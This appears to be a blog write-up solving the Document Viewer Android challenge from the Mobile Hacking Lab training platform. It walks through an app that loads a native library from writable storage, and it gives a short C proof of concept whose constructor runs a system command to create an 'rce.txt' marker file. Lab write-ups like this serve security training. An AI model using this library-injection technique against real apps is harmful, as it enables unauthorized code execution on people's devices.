search

Document Viewer

Hello everyone , In this blog post , I will try to explain my solution steps for Document Viewer challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

  1. install the app and open it

  2. AndroidManifest.xml Examination :

    1. we have a Main Activity Exported and contain an intent filter with action view and have a lot of schema like : file - http - https and the mime type : application/pdf

      image.png

  3. Let’s analysis the Main activity code :

    1. setLoadButtonListener() : This function sets up the button that lets users load a PDF file.

    2. handleIntent() : Handles incoming intents, such as when a user opens a PDF file directly from another app.

    3. renderPdf(Uri uri) : This function renders the selected or received PDF file for viewing.

    4. requestStoragePermissionAsync(Continuation<? super Boolean> continuation) Requests storage permissions .

  4. The important function here is the loadProLibrary() :

    1. the Build.SUPPORTED_ABIS[0] identify the device's architecture (e.g., ARM, x86).

    2. the (getApplicationContext().getFilesDir(), "native-libraries/" + abi) : constructs the path to a folder within the app’s internal storage, where native libraries are stored

    3. then constructs the full path to the Pro version of the native library (libdocviewer_pro.so)

    4. System.load(libraryFile.getAbsolutePath()) attempts to load the native library from the constructed path.

    5. If successful, it enables "Pro" features by setting this.proFeaturesEnabled = true.

  5. After i had decompile the APP i can’t any folder contain the libraries

  6. The exploit here is create a malicious library and then upload it to the path /data/data/com.mobilehackinglab.documentviewer/files/native-libraries/x86_64/

  7. when the app try to load this library we will if we found rce.txt file has been created then we success and get RCE

    #include <stdlib.h>

__attribute__((constructor)) void execute_command() {
    system("touch /data/data/com.mobilehackinglab.documentviewer/rce.txt");
}

  8. Then compiled the c code to be a native library with :

  9. then Push it to the path : and here we success

PreviousCycle ScannerNextConfig Editor

Last updated